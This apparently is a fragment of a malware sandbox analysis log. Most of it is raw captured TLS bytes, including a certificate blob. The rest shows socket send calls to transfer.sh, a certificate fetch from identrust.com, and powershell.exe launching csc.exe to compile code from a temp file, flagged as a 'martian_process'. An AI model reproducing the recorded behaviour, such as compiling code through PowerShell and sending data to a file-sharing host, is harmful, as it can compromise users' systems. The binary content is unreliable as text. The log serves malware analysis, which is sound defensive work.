C—¡~àà†7µZ±½0¿‡n+*ÿ!NÃõ—ð^¬Ã¥¸jð.¼;3¹îKÞÌü䯄 †?ÀUC6öhá6jŽ™Ñÿ¥@§4·ÀÐc959unòºvȓé©KlÎ Ù½ûŸ·hÔe³‚=wSøŽy­ 1u*CØU—rÄ)÷Ä]NÈ®F„0×ò…_¡y»ç^p‹ᆓùÜaq%*¯ßí%PRh‹’ÜåÖµãÚ}Їl„!1®‚õû¹«È‰=áLå8ö½+½–ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|“/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£“¸õ‹/ ÒRC¦o2WeM2ß8S…]~]f)ê¸Ý䕵͵VBÍÄNÆ%8DPmìÎUþéIdÔNʗœ´[Às¨«¸GÂd0‚`0‚H @w!7ÔéB¸îvª<d ·0  *†H†÷  0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10‚"0  *†H†÷ ‚0‚ ‚­è$sô7ó›ž+W(‡¾Ü·ß8Œn<æW x÷u¢þõjnöO(ÛÞh†lD“¶±cýk¿Òê1›!~Ñ3<ºHõÝyß³¸ÿñ!šKÁІqiJffl~<p¿­)"óäÀ怮âK·™~”ŸÓG—|™H#Sè8®O oƒ.ÑIWŒ€t¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOŽK~Ï èÿµw.ô²{JàL% p) áS$ìÙJŒ?‰£aQÞ¬‡”ôcqì.âo[˜á‰\4ylvï;byæÛ¤š/&ÅÐáÞÙŽû·÷¨÷Ç嘏6•çâ7– 6užûr±›¼ùI؁Ý´*ÖAé¬v• ØßÕ½5/(lҘÁ¨ dwnG7ºÎ¬Y^hr։ÅA)>Y>Ý&õ$ɧZ£L@F¡™µ§:Qn†;ž}r§xYí>Qx Ð/²>{JKsüÆêàP|C“t³ÊtçŽÐ0Ô[q6´ºÁ00\H·‚;˜¦}`Š¢£)‚̺½ƒ¢ƒA¡Öñ¶ð¨|†;F¨H*ˆÜvšv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpˆ­NæÙ‹:ÆÝ'Qnÿ¼dõ3CO£‚F0‚B0Uÿ0ÿ0Uÿ0K+?0=0;+0†/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0€ħ±¤{,qúÛáKuÿÄ`…‰0TU M0K0g 0? +‚ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -†+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäs€ˆÈXöé›n0  *†H†÷  ‚ sl–nÿRЮ݌çZ­/¨ã¿É PÂålB»o›ô´OÂDˆuÌë›bnxÞì'º9\õ¢¡nV”pS±»ä¯Ð¢Ã+ԖôÅ 53ùØa6àq´¸µª‚E•Àò©#(çÖ¡ËgÚ C,ª“ÉÞõ«i]õ[†X"ÊMUäpgmÂWÅF9AϊXƒXm™þWè6ð#ªýˆ—Ðã\”Iµµ5Ò.¿N…ïà…’ë;l)# `ÜEL;éûÞÜDøX˜®ê½EE¡ˆ]fÊþéo‚ÈB ûéìã†Þã8ú¤}±ØèI‚„›+èkO 8w.ùÝç9
Data received K
Data received GAÇ®©¤Y¦5›";xzOÂ&«`½|f €ï…Ãñ™¼­xá«X“ÝïËY˜22ÆوúÆrTIœéïIoµŒ¾~ø(u‘&§ja™-8®} tG’uåÕ2—ÅØ64Qá‰J¦90øê…‚ÎÛ³üÓNDpÒ{FB•âªYàŒ*•Ý!ÿíüx³;o‰º¡å‡ÀXtÁ³dgh£É•Œ&Þ©›Õð47êŒìÐDƒƒGÍhIÄ|—ͬ4„¤wůsŸ:RÇýÕfáP!0Hh;ýõšœ`æÿaªÞÿ^ýH¦Ú°kÇ/|ßÝ<ªß¶.xö«@Û ô‡À†¶Ý^¢÷}Æ)Ë0Ú v§ÃÞ3ÊШb1,¢²ßXѨÕ] íZqóìdHOlÈe‹0§ÜÔIbš ™
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ï9©ðҎ ºÑ3¶¯Bv7Ó,É8ä5ƒmv“/ÇYê]©dg(ËëB£e5Œg
Data sent njaç^üÔE> sAh¥Õ‡î÷î ÛvøÖL–¯y‹<Â/5 ÀÀÀ À 28)ÿ transfer.sh  
Data sent FBA]Úáö¤Ëñã“C˳>~–Ᾰ´’ÁÙ œÄÎùÏxw•ž`Õ&Ñ»+BÊÚCðïtüê{oÆã>Ë0ž…W@ <ً„|®€/D5"åĶ(ëdbÅ˙VNPµ^åÑ<6X֏žÁ :¼$Ç>Í
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\fqxbg4nx.cmdline"
file C:\Users\test22\AppData\Local\Temp\fqxbg4nx.cmdline
Time & API Arguments Status Return Repeated

send

buffer: njaç^üÔE> sAh¥Õ‡î÷î ÛvøÖL–¯y‹<Â/5 ÀÀÀ À 28)ÿ transfer.sh  
socket: 1552
sent: 115
1 115 0

send

buffer: FBA]Úáö¤Ëñã“C˳>~–Ᾰ´’ÁÙ œÄÎùÏxw•ž`Õ&Ñ»+BÊÚCðïtüê{oÆã>Ë0ž…W@ <ً„|®€/D5"åĶ(ëdbÅ˙VNPµ^åÑ<6X֏žÁ :¼$Ç>Í
socket: 1552
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2120
0 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\fqxbg4nx.cmdline"